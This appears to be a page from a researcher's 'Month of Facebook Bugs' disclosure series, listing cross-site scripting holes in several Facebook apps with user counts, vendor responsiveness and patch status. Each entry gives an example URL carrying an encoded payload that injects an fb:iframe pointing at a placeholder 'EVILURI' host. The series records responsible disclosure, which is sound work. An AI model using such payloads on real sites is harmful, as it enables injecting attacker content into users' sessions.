FAXX Hack: Hug Me

Current Monthly Active Users: 3,157,995

Current Rank on Application Leaderboard: 55

Application Developer: RockYou

Responsiveness: I notified RockYou and Facebook of this hole on Sep. 14th, and have reminded Facebook a few times since that it remains unpatched. I’ve received no communication from RockYou. Update: Facebook contacted me again this evening and said RockYou had deployed a patch, which I have confirmed.

Vulnerability Status: Unpatched Patched Sep. 30

Example URI: http://apps.facebook.com/doittome/refreshAd.php?guid=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Dogbook

Current Monthly Active Users: 711,503

Current Rank on Application Leaderboard: 159

Application Developer: Poolhouse

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dogbook/search/?name=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: myFarm

(This counts as Sunday’s FAXX Hack.)

Current Monthly Active Users: 945,452

Current Rank on Application Leaderboard: 121

Application Developer: playSocial & take(5)social

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/farmgame/post.pS?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: People I Love!

Current Monthly Active Users: 986,796

Current Rank on Application Leaderboard: 119

Application Developer: Chad Morovitz

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dd832a5e70919175222a209559b89f4b/browse.php?m=n%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E&p=1&process=1

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Photos I Love!

Current Monthly Active Users: 1,100,267

Current Rank on Application Leaderboard: 113

Application Developer: PhotosILove

Responsiveness: About a week after notification the hole remained live, but I checked back with Facebook and things got patched up.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/photosilove/browse.php?m=u&user=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Death’s Time

Current Monthly Active Users: 11,802,383

Current Rank on Application Leaderboard: 16

Application Developer: 3happybytes

Responsiveness: I received no communication at first from the developers, but Facebook did. The hole was patched about a week after notification. After patching, the developer get in touch to confirm the fix.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Willy’s Sweet Shop

Facebook Verified Application

Current Monthly Active Users: 853,598

Current Rank on Application Leaderboard: 136

Application Developer: Mob Science

Responsiveness: Facebook has been in touch with the developers, and today (about a week after notification) they issued a patch.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/ochristmastree/?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Trazzler

Facebook Verified Application

Current Monthly Active Users: 5,448

Current Rank on Application Leaderboard: 2,833

Application Developer: Trazzler

Responsiveness: The developers at Trazzler have been responsive, and I’ve been working with them to try and get the hole patched. I was honestly a little disappointed by the information they got from Facebook about the hole, but that’s for another post.

Vulnerability Status: Unpatched Patched Sep. 24

Example URI: http://apps.new.facebook.com/trazzler/ajax/browse_navigation/?browse-search=%3Cfb%3Aiframe+src%3D’http%3A%2F%2FEVILURI%2F’%3E

Notes: See the leaderboard rank of Trazzler? I chose to check it after looking at the list of Facebook Verified Applications, which means AppData lists around 2,800 applications I haven’t checked which have higher MAU than Trazzler. This Month of Facebook Bugs only begins to scratch the surface of Facebook applications.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 6 7 8 9 10 15